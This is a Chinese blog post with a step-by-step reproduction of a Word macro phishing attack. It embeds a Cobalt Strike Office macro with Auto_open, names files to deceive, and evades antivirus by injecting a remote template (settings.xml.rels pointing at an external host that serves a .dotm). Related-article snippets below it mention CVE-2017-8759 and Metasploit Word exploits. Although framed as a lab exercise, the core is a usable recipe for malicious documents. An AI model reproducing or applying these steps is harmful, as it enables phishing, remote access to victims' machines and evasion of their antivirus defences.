Word文档注入宏实现钓鱼复现

最新推荐文章于 2023-03-08 11:28:07 发布
最新推荐文章于 2023-03-08 11:28:07 发布
阅读量832 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43593134/article/details/118676719
版权

Word文档注入宏实现钓鱼复现

网上很多相关的文章,但都不是很细节,遇到了一些问题,在这里统一汇总一下。

前期准备

  • 环境准备:
    一台kali用于使用CS、一台靶机、一台vps服务器(这里使用kali)
    Word使用系统自带的Word2007

开始复现

  1. 首先启用Word的开发工具选项在这里插入图片描述在这里插入图片描述在这里插入图片描述
  2. 创建一个doc或者docx文档,起一个混淆的名字。
    在这里插入图片描述
  3. 打开kali,运行cs,创建Lisenter,点击Attacks-Packages-MS Office Macro在这里插入图片描述在这里插入图片描述选择监听者,然后复制
  4. 打开doc,点击开发工具里的Visual Basic在这里插入图片描述将刚刚复制的内容粘贴到ThisDocumnet中,右上角选择Auto_open,意味着点开文件自动启用宏在这里插入图片描述在这里插入图片描述
    ctrl+s保存后会提示,选择否即可,另存为dotm文件
    保存完毕之后右键打开doc文件
    在这里插入图片描述
    在这里插入图片描述点左上角弹出安全警告 ,点击选项,选择启用此内容,确定。
    可以看到靶机已经上线了,说明步骤没问题。
    在这里插入图片描述
  5. 因为单纯的注入宏一般的杀毒软件都会爆毒,接下来尝试绕过
    在这里插入图片描述
    目前桌面存在以上两个文件,将dotm文件保存到kali某目录下,这里我放在桌面
    在这里插入图片描述
    注意!一定要在该目录下,开启kali的http服务。因为是在内网复现,这里kali充当VPS服务器也可以(暂时不想买)。
    在这里插入图片描述
    6.新建一个docx文档(建议用docx),起一个响亮的名字在这里插入图片描述保存之后,修改后缀名,由.docx改为.zip
    在这里插入图片描述
    双击打开该压缩包,来到\word\_rels目录下
    在这里插入图片描述可以看到这里只有一个.rels文件,我们再新建一个settings.xml.rels
    在这里插入图片描述
    编辑内容为
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="http://xxxx/jianli.dotm"
TargetMode="External"/>
</Relationships>
  1. 将该文件拖到压缩包的\word\_rels目录下
    在这里插入图片描述
  2. 返回上级目录,找到settings.xml文件,用记事本打开
    插入标签,id为上一步保存的Id
<w:attachedTemplate r:id="xxxx"/>
  1. 保存修改之后,重新将.zip修改为.docx,打开文件
    在这里插入图片描述不管点确定还是关闭,只要点击安全警告启用宏,即可上线
nzyp_
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-8759复现(word钓鱼
0xdawn的博客
01-23 1301
CVE-2017-8759漏洞复现(word钓鱼) 0x01 虚拟机kali-linux、win7靶机 1.为了方便起见,直接利用GitHub上的一个POC。 git clone https://github.com/bhdresh/CVE-2017-8759.git 2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件。 python cve-20...
恶意攻击者利用 Word 钓鱼文档瞄准 Github 开发者
weixin_34268579的博客
06-02 166
据安全公司 Palo Alto Networks 报告,以前主要针对俄罗斯人的恶意攻击程序 Dimnie 今年瞄准了 Github 上的开发者。多名使用 Github 的开源开发者收到了钓鱼邮件,攻击者伪装成对他们的开源项目感兴趣,表示要进行合作,试图诱骗开发者点击附件。大致内容如下: 虽然这种类似的邮件开发者可能会受到很多,但每封钓鱼邮件都会携...
客户端渗透之——基于Word文件格式的渗透攻击
冰河的专栏
01-24 1759
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633173 攻击机: Kali 192.168.175.128 靶机 WinXP 192.168.175.130 程序 Office 2003 1.生成Word文档 msfconsole use exploit/windows/fileformat/ms10_087...
渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四)
qq_34801745的博客
12-17 2877
** 渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四) ** 作者:大余 时间:2020-12-16 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定
office钓鱼学习
qq_38618396的博客
12-29 538
先建一个word,找到一张简历,将简历虚化,并另存为doc: 在office中需要使用开发工具,需要自己开启: 文件-更多-选项-自定义功能区-从下列选择命令-主选项卡-开发工具,将开发工具前面的复选框给选上 选择 开发工具-图像控件 将这个控件设置为 浮于文字上方,并将控件拉满文档 点击这个控件,将属性设置为图片的名称 先使用cs生成 在auto_open()函数首部编写代码,设置图片的位置为0、高度为0,让运行后doc上图片消失,然后保存,office马就制作好了 点击之后,c
C语言实现小猫钓鱼算法
01-21
C语言小猫钓鱼实现了两个人打牌,分别依次将牌放到桌子上,若A出的牌与桌子上的牌一样,则A将桌子上两张一样的牌及其中间所有牌放到A手中,看A,B两个人谁先打完所有牌。 #include struct queue { int data[1000...
第九节 钓鱼网站的复现与防御(天融信网络安全公开课程)
09-23
第九节 钓鱼网站的复现与防御(天融信网络安全公开课程)
java实现小猫钓鱼游戏
08-26
Java 实现小猫钓鱼游戏知识点总结 在本文中,我们将详细介绍 Java 实现小猫钓鱼游戏的知识点,包括游戏规则、游戏实现、Java 语言特性等。 一、游戏规则 小猫钓鱼游戏是一种两人游戏,游戏规则如下: * 游戏开始...
C语言实现小猫钓鱼游戏
08-26
C语言实现小猫钓鱼游戏 本文将详细介绍C语言实现小猫钓鱼游戏的知识点,主要涵盖了游戏的设计、实现和源代码解析。 1. 游戏设计 小猫钓鱼游戏是一种基于卡牌的游戏,游戏规则是每人各拿一半的牌,然后你放1张牌,...
Word模板注入攻击
dda6607的博客
05-16 980
Word模板注入攻击 0x00 工具准备 phishery:https://github.com/ryhanson/phishery/releases office版本:office 2010 0x01 什么是Word模板注入攻击 Word模板注入攻击就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以...
word文档注入(追踪word文档)未完
qq_38641816的博客
03-16 316
1,需求 追踪word文档是否被打开 2,实现 正常来说,解压word文档。内部如下所示 打开如下目录所示的文件 在文档后面追加如下代码,这是个配置文件,target可以配置自己的url <Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="url" TargetMode="External"/&gt
革新文档管理:使用多种编程语言从 Word 中提取 Excel 附件和文件名
陈书予
03-08 2011
当我们在处理Microsoft Word文档时,经常会遇到嵌入了Excel附件的情况。在这种情况下,我们可能需要提取嵌入式Excel文件并将其保存为单独的文件。在本文中,我们将探讨如何使用Python、Java、JavaScript、Go、C#和C++来提取Word文档中的Excel附件并识别文件名保存。
Kali渗透测试:使用Word病毒进行渗透攻击
Liu_Bruce的博客
05-14 4355
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒在Word中引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,病毒利用这一点得到了大范围的传播。 构造一个包含病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
红队简单钓鱼实战---office
LvHLong的博客
05-30 1375
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office介绍 是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成,当在工作时,就可以直接利用事先编好的自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 病毒是一种常见的计算机病毒,......
病毒的研究与实例分析05——无文件携带病毒
鬼手的博客
03-11 1587
文章目录前言远程模板注入执行docx文件格式解析窃取NTLM Hashes小结说明 前言 docx文件可能是病毒吗? 如果你是一周前问笔者这个问题,笔者一定会斩钉截铁的说:”不可能!” 。笔者在之前的文章中提到过,docx中是不含的,所以不可能是病毒。但是,现在笔者却会斩钉截铁的说:”即使没有也可能是病毒!”。 故事要从很久很久以前说起,office文档诞生后不久,就迅速占领各大平台,...
利用DOCX文档远程模板注入执行代码
weixin_44922845的博客
04-03 2557
利用DOCX文档远程模板注入执行代码 简介 本地文件中在没有代码的情况下,攻击者可以尝试执行远程文件中代码。其中来自APT28的最新样本将此技术展现的淋漓尽致。该样本是docx文件,文件内没有任何相关信息,但是打开该文件后,却会弹出经典的“安全警告”。本实验将实现通过远程加载执行代码的攻击方式。 应用场景 该种攻击方式与传统的启用文档相比,这种攻击的好处是多方面的。在对目标执行网络...
word操作总结
雨落秋花的博客
02-06 1236
以前的下载链接 不知道为啥需要积分那么多了,重新放一个链接: https://pan.baidu.com/s/1ohEuEzRKE5C_46jNxCUjIw 提取码:iwro 在公司工程中,有好多需求需要用到导出word文件,走过好多路,最早用的csdn上一个vb写的库导出word,完成当时一个紧迫项目 后来继续研究报表时,用了qt的com组件调用库,来调用微软的office组件进行报表导...
Python处理docx中的xml结点
gongzairen的博客
11-14 1618
xml结点/节点的python方法
【安全漏洞】黑客利用IE 0 day漏洞部署VBA恶意软件
HBohan的博客
08-04 329
远程模板 研究人员分析settings.xml.rels中嵌入的远程模板发现其中含有完全特征的VBA 远程访问木马,可以执行以下功能: ◼收集受害者信息; ◼识别受害者机器上运行的反病毒软件; ◼执行shell-code; ◼删除文件; ◼上传和下载文件; ◼读取硬盘和文件系统信息。 第二个模板嵌入在Document.xml.rels文件中,会加载在文件中。研究人员分析加载的代码发现其中包含一个IE CVE-2021-26411漏洞利用,该漏洞利用曾被Lazarus APT组织用于攻击安全研究人员。漏洞利用
使用tensorflow实现钓鱼网站检测
最新发布
05-13
钓鱼网站检测是一项非常重要的任务,可以帮助人们避免被骗取个人信息或财务信息。下面是使用 TensorFlow 实现钓鱼网站检测的步骤: 1. 数据收集:首先需要收集一定数量的钓鱼网站和正常网站的数据,可以使用网络爬虫或者手动收集。对于钓鱼网站,需要注意不要在其上输入真实的信息,以免造成损失。 2. 数据预处理:对于收集到的数据,需要进行一定的预处理,例如去除 HTML 标签、提取关键词等操作。 3. 特征提取:将预处理后的数据转换为机器学习算法可以处理的特征向量,可以使用 TF-IDF 算法、词袋模型等方法进行特征提取。 4. 模型训练:使用 TensorFlow 框架构建深度学习模型,可以使用卷积神经网络、循环神经网络等模型进行训练。 5. 模型评估:使用测试集对训练好的模型进行评估,计算准确率、召回率等指标。 6. 模型部署:将训练好的模型部署到实际应用中,可以使用 Flask 等框架搭建 Web 服务,提供钓鱼网站检测服务。 需要注意的是,在实际应用中,由于钓鱼网站的形式多种多样,可能需要使用多种方法进行检测,例如使用 URL 特征、网页内容特征等。同时,需要定期更新数据集和模型,以保证检测的准确率和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值